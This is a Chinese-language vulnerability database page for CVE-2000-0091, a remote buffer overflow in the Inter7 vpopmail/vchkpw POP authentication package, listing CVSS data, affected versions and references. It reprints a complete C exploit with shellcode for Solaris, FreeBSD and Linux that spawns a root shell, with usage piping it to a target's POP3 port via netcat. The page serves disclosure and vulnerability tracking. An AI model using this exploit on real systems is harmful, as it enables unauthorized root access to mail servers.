CVE-2000-0091
CVSS10.0
发布时间 :2000-01-21 00:00:00
修订时间 :2008-09-10 15:02:53
NMCOE    

[原文]Buffer overflow in vchkpw/vpopmail POP authentication package allows remote attackers to gain root privileges via a long username or password.


[CNNVD]Inter7 vpopmail (vchkpw)缓冲区溢出漏洞(CNNVD-200001-052)

        vchkpw/vpopmail POP认证包存在缓冲区溢出漏洞。远程攻击者借助超长用户名或密码可以提升根特权。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:inter7:vpopmail:vchkpw_3.4.6
cpe:/a:inter7:vpopmail:vchkpw_3.4.9
cpe:/a:inter7:vpopmail:vchkpw_3.4.1
cpe:/a:inter7:vpopmail:vchkpw_3.4.3
cpe:/a:inter7:vpopmail:vchkpw_3.4.8
cpe:/a:inter7:vpopmail:vchkpw_3.4.5
cpe:/a:inter7:vpopmail:vchkpw_3.4.2
cpe:/a:inter7:vpopmail:vchkpw_3.4.4
cpe:/a:inter7:vpopmail:vchkpw_3.4.11
cpe:/a:inter7:vpopmail:vchkpw_3.4.7

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0091
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0091
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200001-052
(官方数据源) CNNVD

- 其它链接及资源

http://www.inter7.com/vpopmail/ChangeLog
(UNKNOWN)  MISC  http://www.inter7.com/vpopmail/ChangeLog
http://www.inter7.com/vpopmail/
(UNKNOWN)  MISC  http://www.inter7.com/vpopmail/
http://www.securityfocus.com/bid/942
(UNKNOWN)  BID  942

- 漏洞信息

Inter7 vpopmail (vchkpw)缓冲区溢出漏洞
危急 缓冲区溢出
2000-01-21 00:00:00 2005-05-02 00:00:00
远程※本地  
        vchkpw/vpopmail POP认证包存在缓冲区溢出漏洞。远程攻击者借助超长用户名或密码可以提升根特权。

- 公告与补丁

        Inter7 has addressed this vulnerability as of version 3.1.11e. You can download the most recetn version here:
        http://www.inter7.com/vpopmail/

- 漏洞信息 (19727)

Inter7 vpopmail (vchkpw) <= 3.4.11 Buffer Overflow Vulnerability (EDBID:19727)
linux local
2000-01-21 Verified
0 k2
N/A [点击下载]
source: http://www.securityfocus.com/bid/942/info


Vpopmail (vchkpw) is free GPL software package built to help manage virtual domains and non /etc/passwd email accounts on Qmail mail servers. This package is developed by Inter7 (Referenced in the 'Credit' section) and is not shipped, maintained or supported by the main Qmail distribution.

Certain versions of this software are vulnerable to a remote buffer overflow attack in the password authentication of vpopmail. 

/*
   qmail-qpop3d-vchkpw.c (v.3)
   by: K2,
      
   The inter7 supported vchkpw/vpopmail package (replacement for chkeckpasswd)
   has big problems ;)

   gcc -o vpop qmail-pop3d-vchkpw.c [-DBSD|-DSX86]
   ( ./vpop [offset] [alignment] ; cat ) | nc target.com 110   

   play with the alignment to get it to A) crash B) work. 
   qmail-pop3d/vchkpw remote exploit. (Sol/x86,linux/x86,Fbsd/x86) for now.
   Tested agenst: linux-2.2.1[34], FreeBSD 3.[34]-RELEASE
   vpopmail-3.4.10a/vpopmail-3.4.11[b-e]

   Hi plaguez.
   prop's to Interrupt for testing with bsd, _eixon an others ;)
   cheez shell's :)
   THX goes out to STARBUCKS*!($#!
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SIZE   260
#define NOP    0x90
#ifdef SX86
#define DEFOFF 0x8047cfc
#define NOPDEF 75
#elif BSD
#define DEFOFF 0xbfbfdbbf
#define NOPDEF 81
#else
#define DEFOFF 0xbffffcd8
#define NOPDEF 81
#endif 

char *shell = 
#ifdef SX86 // Solaris IA32 shellcode, cheez
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
"\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
"\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
"\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff"; 
#elif BSD // fBSD shellcode, mudge@l0pht.com                                 
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
#else // Linux shellcode, no idea
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
"\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
"\xff\xff/bin/sh\xff";
#endif

int main(int argc, char **argv)
{
   int i=0,esp=0,offset=0,nop=NOPDEF;
   char buffer[SIZE];

   if (argc > 1) offset += strtol(argv[1], NULL, 0);
   if (argc > 2) nop += strtol(argv[2], NULL, 0);

   esp = DEFOFF;
   
   memset(buffer, NOP, SIZE);
   memcpy(buffer+nop, shell, strlen(shell));
   for (i = (nop+strlen(shell)+1); i < SIZE; i += 4) {
      *((int *) &buffer[i]) = esp+offset;
   }
   
   printf("user %s\n",buffer);
   printf("pass ADMR0X&*!(#&*(!\n");

   fprintf(stderr,"\nbuflen = %d, nops = %d, target = 0x%x\n\n",strlen(buffer),nop,esp+offset);
   return(0);
}
		

- 漏洞信息

1204
vchkpw/vpopmail POP Authentication Multiple Field Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2000-01-22 Unknow
2000-01-22 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站